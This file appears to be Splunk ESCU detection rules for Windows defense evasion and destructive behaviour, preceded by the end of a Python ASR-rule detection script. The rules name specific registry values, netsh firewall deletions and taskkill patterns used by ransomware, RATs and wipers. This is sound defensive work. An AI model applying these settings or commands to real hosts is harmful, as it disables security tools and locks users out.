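    {"host": "ws02", "EventCode": 5007,
     "Old_Value": ASR_KEY + "56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2",
     "New_Value": ASR_KEY + "56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1"},
    {"host": "ws02", "EventCode": 1116, "ID": ""},  # unrelated Defender event, dropped
]

if __name__ == "__main__":
    for hit in rule_disabled(SAMPLE_EVENTS):
        print(f"ASR rule disabled on {hit['dest']}: {hit['ASR_Rule']} "
              f"({hit['Old_Registry_Value']} -> {hit['New_Registry_Value']})")
    for (dest, category, rule), n in sorted(stack(SAMPLE_EVENTS).items()):
        print(f"{dest:5} {category:14} {n:3} {rule}")
```

On the sample data the rule-disabled check fires once (ws02, the Office child-process rule going from Block to Disabled), and the stacking roll-up yields five rows, one per in-scope event, with the unrelated EventCode 1116 dropped. Lower-casing the GUID before the lookup matters: block/audit events and 5007 values do not agree on case, and a case-sensitive lookup would otherwise leave ASR_Rule as NULL for half of them.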
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender Exclusion Registry Entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos", "Windows Defense Evasion Tactics", "Azorult", "Qakbot", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = Exclusion registry $registry_path$ modified or added on $dest$ for Windows Defender action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender Exclusion Registry Entry - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos", "Windows Defense Evasion Tactics", "Azorult", "Qakbot", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects a suspicious process modifying a registry key related to the Windows Defender exclusion feature. This registry location is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus by excluding folder paths, file paths, processes or extensions from real-time or scheduled scans so that malicious code can execute unscanned. 
This is a good indicator of defense evasion and a cue to look further at events that follow this behavior. action.notable.param.rule_title = Windows Defender Exclusion Registry Entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter` [ESCU - Windows Delete or Modify System Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies potentially malicious 'netsh' processes that manipulate firewall configurations. This behavior has been observed in the NJRAT malware, which deletes its added firewall rules as part of its cleanup process. Leveraging this anomaly detection can be a valuable approach for detecting malware, such as NJRAT, that makes alterations to firewall configurations as a component of its malicious activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.004"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies potentially malicious 'netsh' processes that manipulate firewall configurations. This behavior has been observed in the NJRAT malware, which deletes its added firewall rules as part of its cleanup process. 
Leveraging this anomaly detection can be a valuable approach for detecting malware, such as NJRAT, that makes alterations to firewall configurations as a component of its malicious activities. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may legitimately modify or delete firewall configuration. 
action.escu.creation_date = 2023-09-08 action.escu.modification_date = 2023-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Delete or Modify System Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A $process_name$ deleted a firewall configuration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Delete or Modify System Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process = "* firewall *" Processes.process = "* delete *" by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_delete_or_modify_system_firewall_filter` [ESCU - 
Windows Deleted Registry By A Non Critical Process File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects registry deletions performed by a process running from a suspicious file path. This technique was seen in the Double Zero wiper malware, which deletes all subkeys in the HKLM, HKCU and HKU registry hives as part of its destructive payload on targeted hosts. This anomaly detection can catch malware or adversaries deleting registry keys as part of defense evasion or impact, but can also fire on third-party application updates or installations; in that scenario a false positive filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects registry deletions performed by a process running from a suspicious file path. This technique was seen in the Double Zero wiper malware, which deletes all subkeys in the HKLM, HKCU and HKU registry hives as part of its destructive payload on targeted hosts. This anomaly detection can catch malware or adversaries deleting registry keys as part of defense evasion or impact, but can also fire on third-party application updates or installations; in that scenario a false positive filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection can also fire on third-party application updates or installations; in that scenario a false positive filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Deleted Registry By A Non Critical Process File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Double Zero Destructor"] action.risk = 1 action.risk.param._risk_message = Registry was deleted by a suspicious $process_name$ with process path $process_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Deleted Registry By A Non Critical Process File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Double Zero Destructor"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry WHERE Registry.action=deleted BY _time span=1h Registry.dest 
Registry.registry_path Registry.registry_value_name Registry.registry_key_name Registry.process_guid Registry.registry_value_data Registry.action | `drop_dm_object_name(Registry)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes WHERE NOT (Processes.process_path IN ("*\\windows\\*", "*\\program files*")) by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.user Processes.parent_process_name Processes.parent_process Processes.process_path Processes.process_guid | `drop_dm_object_name(Processes)`] | fields _time parent_process_name parent_process process_name process_path process process_guid registry_path registry_value_name registry_value_data registry_key_name action dest user | `windows_deleted_registry_by_a_non_critical_process_file_path_filter` [ESCU - Windows Disable Change Password Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a suspicious registry modification that disables the change password feature of a Windows host. The modification disables the Change Password button on the Windows Security dialog box (which appears when you press Ctrl+Alt+Del), so users cannot change their Windows password on demand. This technique has been seen in malware families such as ransomware to prevent users from changing their passwords after the attacker has taken control of the network or a system. Administrators may also implement this setting to prevent normal users from changing the password of a critical host or server; in that scenario a filter is needed to minimize false positives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Change", "Endpoint"] action.escu.eli5 = This analytic detects a suspicious registry modification that disables the change password feature of a Windows host. 
This registry modification may disables the Change Password button on the Windows Security dialog box (which appears when you press Ctrl+Alt+Del). As a result, users cannot change their Windows password on demand. This technique was seen in some malware family like ransomware to prevent the user to change the password after ownning the network or a system during attack. This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive. 
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Change Password Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Windows Defense Evasion Tactics"]
action.risk = 1
action.risk.param._risk_message = Registry modification in "DisableChangePassword" on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Change Password Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_change_password_through_registry_filter`

[ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious registry modification that disables the Lock Computer feature of Windows. This registry modification prevents the user from locking the screen or computer and is abused by several malware families, for example ransomware. Threat actors use this technique to make their payload more impactful on the compromised host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious registry modification that disables the Lock Computer feature of Windows. This registry modification prevents the user from locking the screen or computer and is abused by several malware families, for example ransomware. Threat actors use this technique to make their payload more impactful on the compromised host.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Windows Defense Evasion Tactics", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Registry modification in "DisableLockWorkstation" on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_lock_workstation_feature_through_registry_filter`

[ESCU - Windows Disable LogOff Button Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious registry modification that disables the log off feature on a Windows host. When enabled, this registry setting prevents users from logging off the system by any method, including programs run from the command line such as scripts. It also disables or removes all menu items and buttons that log the user off the system. This technique has been seen abused by ransomware to make the compromised host unusable and to make it hard to revert other registry modifications on the machine that need a restart to take effect. Administrators may implement this Windows feature on servers where shutdown is critical; in that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious registry modification that disables the log off feature on a Windows host. When enabled, this registry setting prevents users from logging off the system by any method, including programs run from the command line such as scripts. It also disables or removes all menu items and buttons that log the user off the system. This technique has been seen abused by ransomware to make the compromised host unusable and to make it hard to revert other registry modifications on the machine that need a restart to take effect. Administrators may implement this Windows feature on servers where shutdown is critical; in that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = Administrators may implement this Windows feature on servers where shutdown is critical. In that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable LogOff Button Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Registry modification in "NoLogOff" on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable LogOff Button Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*" Registry.registry_value_name IN ("NoLogOff", "StartMenuLogOff") Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_logoff_button_through_registry_filter`

[ESCU - Windows Disable Memory Crash Dump - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a process that is attempting to disable the ability of Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature normally causes Windows to write a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a process that is attempting to disable the ability of Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature normally causes Windows to write a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check).
action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information, including the name of the process responsible for the changes, from your endpoints into the `Endpoint` data model in the `Filesystem` and `Registry` nodes.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Memory Crash Dump - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Data Destruction", "Windows Registry Abuse", "Hermetic Wiper"]
action.risk = 1
action.risk.param._risk_message = A process was identified attempting to disable memory crash dumps on $dest$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Memory Crash Dump - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Data Destruction", "Windows Registry Abuse", "Hermetic Wiper"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a process that is attempting to disable the ability of Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature normally causes Windows to write a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check).
action.notable.param.rule_title = Windows Disable Memory Crash Dump
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled") AND Registry.registry_value_data="0x00000000" by _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.registry_key_name | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_memory_crash_dump_filter`

[ESCU - Windows Disable Notification Center - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following search identifies a registry modification that disables the Windows Notification Center feature on a Windows host. This registry modification removes the notification and action center from the notification area on the taskbar. This modification is seen in RAT malware to cover its tracks while downloading its other components or payloads.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following search identifies a registry modification that disables the Windows Notification Center feature on a Windows host. This registry modification removes the notification and action center from the notification area on the taskbar. This modification is seen in RAT malware to cover its tracks while downloading its other components or payloads.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable this Windows feature.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Notification Center - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The Windows notification center was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Notification Center - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= "DisableNotificationCenter" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_notification_center_filter`

[ESCU - Windows Disable or Modify Tools Via Taskkill - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is designed to identify potentially malicious processes that terminate other processes using taskkill.exe. This technique has been observed in various malware instances, employed by adversaries and red teamers alike, to forcibly terminate other processes, whether they be security products or other legitimate applications, as part of their malicious activities. Detecting this anomaly serves as a valuable alert mechanism to identify suspicious processes or malware attempting to evade detection and disrupt system stability.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is designed to identify potentially malicious processes that terminate other processes using taskkill.exe. This technique has been observed in various malware instances, employed by adversaries and red teamers alike, to forcibly terminate other processes, whether they be security products or other legitimate applications, as part of their malicious activities. Detecting this anomaly serves as a valuable alert mechanism to identify suspicious processes or malware attempting to evade detection and disrupt system stability.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Network administrators can use this application to kill processes during an audit or investigation.
action.escu.creation_date = 2023-09-13
action.escu.modification_date = 2023-09-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable or Modify Tools Via Taskkill - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["NjRAT"]
action.risk = 1
action.risk.param._risk_message = A taskkill process used to terminate a process was executed on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable or Modify Tools Via Taskkill - Rule
action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe" Processes.process IN ("* /f*", "* /t*") Processes.process IN ("* /im*", "* /pid*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_or_modify_tools_via_taskkill_filter`

[ESCU - Windows Disable Shutdown Button Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious registry modification that disables the shutdown button for the logged-on user. This technique has been seen in several malware families, especially ransomware such as the KillDisk variant, to make the compromised host unusable and to make it hard to revert other registry modifications on the machine that need a restart to take effect. Administrators may implement this Windows feature on servers where shutdown is critical; in that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
